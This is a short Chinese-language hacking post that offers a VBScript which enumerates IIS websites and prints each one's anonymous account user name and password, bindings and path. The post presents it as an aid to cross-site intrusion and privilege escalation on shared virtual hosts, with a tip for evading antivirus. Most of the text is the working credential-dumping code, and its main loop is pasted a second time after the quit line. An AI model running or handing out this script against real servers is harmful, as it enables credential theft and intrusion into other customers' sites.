能读取到iis用户和密码,对跨站或者提权是有帮助的!像星外的虚拟主机。
有时候exe无法运行或者被杀毒软件K的话用VBS试试。挺简单的代码。
代码如下:
Set
ObjService
=
GetObject
(
"
IIS://LocalHost/W3SVC
"
)
For Each obj3w In objservice
childObjectName = replace (obj3w.AdsPath, Left (obj3w.Adspath, 22 ), "" )
if IsNumeric (childObjectName) = true then
set IIs = objservice.GetObject( " IIsWebServer " ,childObjectName)
if err.number <> 0 then
exit for
msgbox ( " error! " )
wscript.quit
end if
serverbindings = IIS.serverBindings
ServerComment = iis.servercomment
set IISweb = iis.getobject( " IIsWebVirtualDir " , " Root " )
user = iisweb.AnonymousUserName
pass = iisweb.AnonymousUserPass
path = IIsWeb.path
list = list & servercomment & " " & user & " " & pass & " " & join (serverBindings, " , " ) & " " & path & vbCrLf & vbCrLf
end if
Next
wscript.echo list
Set ObjService = Nothing
wscript.echo " from : QQ1070277727 " & vbTab & vbCrLf
WScript.Quit
For Each obj3w In objservice
childObjectName = replace (obj3w.AdsPath, Left (obj3w.Adspath, 22 ), "" )
if IsNumeric (childObjectName) = true then
set IIs = objservice.GetObject( " IIsWebServer " ,childObjectName)
if err.number <> 0 then
exit for
msgbox ( " error! " )
wscript.quit
end if
serverbindings = IIS.serverBindings
ServerComment = iis.servercomment
set IISweb = iis.getobject( " IIsWebVirtualDir " , " Root " )
user = iisweb.AnonymousUserName
pass = iisweb.AnonymousUserPass
path = IIsWeb.path
list = list & servercomment & " " & user & " " & pass & " " & join (serverBindings, " , " ) & " " & path & vbCrLf & vbCrLf
end if
Next
wscript.echo list
Set ObjService = Nothing
wscript.echo " from : QQ1070277727 " & vbTab & vbCrLf
WScript.Quit
把上面代码保存成IIS.vbs 运行命令:cscript.exe iis.vbs或者直接iis.vbs